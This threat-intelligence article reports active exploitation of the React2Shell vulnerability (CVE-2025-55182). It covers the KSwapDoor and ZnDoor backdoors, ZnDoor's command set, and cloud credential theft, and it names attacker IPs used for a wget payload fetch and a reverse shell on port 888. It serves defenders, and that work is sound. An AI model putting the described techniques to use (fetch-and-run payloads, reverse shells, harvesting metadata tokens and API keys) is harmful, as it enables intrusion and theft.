React2Shell Vulnerability

Security researchers have confirmed that the critical vulnerability known as React2Shell is being actively abused by multiple threat actors to compromise Linux-based systems. The flaw is being leveraged to deploy several malware families, most notably KSwapDoor and ZnDoor, enabling deep and persistent access to affected environments. The ongoing exploitation highlights how quickly high‑impact application flaws are operationalized once disclosed.

KSwapDoor: A Stealth-Focused Linux Backdoor

KSwapDoor is a carefully engineered remote access tool built to remain hidden for long periods. It establishes an internal mesh network that allows infected servers to communicate with one another, helping the attackers bypass perimeter defenses and maintain resilience if individual nodes are blocked. Its network traffic is protected with strong encryption, making inspection and detection significantly harder. One of its most concerning capabilities is a dormant or 'sleeper' state, which allows the malware to remain inactive until it receives a covert trigger that reactivates it, effectively bypassing firewall controls.

Researchers clarified that KSwapDoor had previously been misidentified as BPFDoor. In reality, it is a Linux backdoor that supports interactive shell access, arbitrary command execution, file manipulation, and scanning for lateral movement opportunities. To further blend in, it masquerades as a legitimate Linux kernel swap daemon, reducing the likelihood of raising suspicion during routine system monitoring.

ZnDoor Campaigns Targeting Japanese Organizations

In parallel, organizations in Japan have been targeted with attacks that exploit React2Shell to deliver ZnDoor. This remote access trojan has been observed in real-world activity since at least December 2023. These intrusions typically begin with a simple bash command that retrieves the payload from a remote server at 45.76.155.14 using wget and then executes it locally.

Once installed, ZnDoor connects back to attacker‑controlled infrastructure to receive instructions and act on them. Its functionality is broad and enables full control over the compromised host, as illustrated by the supported command set below:

• shell and interactive_shell for direct command execution and interactive access
• explorer, explorer_cat, explorer_delete, explorer_upload, and explorer_download for file and directory operations
• system for collecting host information
• change_timefile to alter file timestamps
• socket_quick_startstreams to launch a SOCKS5 proxy
• start_in_port_forward and stop_in_port to manage port forwarding

CVE-2025-55182 and Multi-Group Weaponization

The broader activity coincides with widespread exploitation of CVE-2025-55182, a React2Shell vulnerability assigned a maximum CVSS score of 10.0. At least five China‑aligned threat groups have been observed weaponizing this flaw to distribute a diverse range of payloads, including tunneling tools, downloaders, and multiple Linux backdoors. Among these were MINOCAT, SNOWLIGHT, COMPOOD, an updated HISONIC variant that blends into legitimate traffic using Cloudflare Pages and GitLab, and a Linux version of ANGRYREBEL, also known as Noodle RAT.

Post‑Exploitation Abuse and Payload Diversity

After gaining initial code execution, attackers commonly run arbitrary commands to deepen their foothold. This includes establishing reverse shells to known Cobalt Strike infrastructure, deploying remote monitoring and management tools such as MeshAgent, altering the authorized_keys file, and enabling direct root logins. Additional payloads seen during these operations include VShell, EtherRAT, ShadowPad, XMRig, and repeated deployments of SNOWLIGHT.

To evade detection, the campaigns frequently rely on Cloudflare Tunnel endpoints under the trycloudflare.com domain, allowing command-and-control traffic to blend in with legitimate services. Extensive reconnaissance is then carried out to map the environment, support lateral movement, and identify valuable credentials.

Cloud Credential Harvesting and Secret Discovery

A major focus of these attacks is credential theft within cloud environments. Threat actors have been observed querying instance metadata services for Azure, AWS, Google Cloud Platform, and Tencent Cloud in an effort to obtain identity tokens and expand their access. They also deploy secret‑scanning tools such as TruffleHog and Gitleaks, alongside custom scripts, to extract sensitive material. This includes attempts to steal AI and cloud‑native credentials like OpenAI API keys, Databricks tokens, Kubernetes service account secrets, and access tokens obtained through Azure CLI and Azure Developer CLI tooling.

Next.js Exploitation and Data Exfiltration

In a related campaign, researchers documented exploitation of multiple Next.js flaws, including CVE-2025-29927 and CVE-2025-66478, the latter being an earlier identifier for the same React2Shell issue. These attacks focused on systematically extracting configuration files, environment variables, SSH keys, cloud credentials, Git authentication data, shell command history, and sensitive system files such as passwd and shadow. The malware also establishes persistence, installs a SOCKS5 proxy, opens a reverse shell to 67.217.57.240 on port 888, and deploys a React scanner to search the internet for additional vulnerable targets.

Operation PCPcat: Scale and Impact

The combined activity, tracked under the name Operation PCPcat, is believed to have already compromised 59,128 servers. Analysts assess the campaign as indicative of large‑scale intelligence collection and industrialized data exfiltration. Current measurements suggest more than 111,000 IP addresses remain vulnerable to React2Shell exploitation, with the highest concentration in the United States, followed by Germany, France, and India. Gathered telemetry further indicates that hundreds of malicious IP addresses across regions such as the U.S., India, the U.K., Singapore, and the Netherlands have actively participated in exploitation attempts within a single 24‑hour period.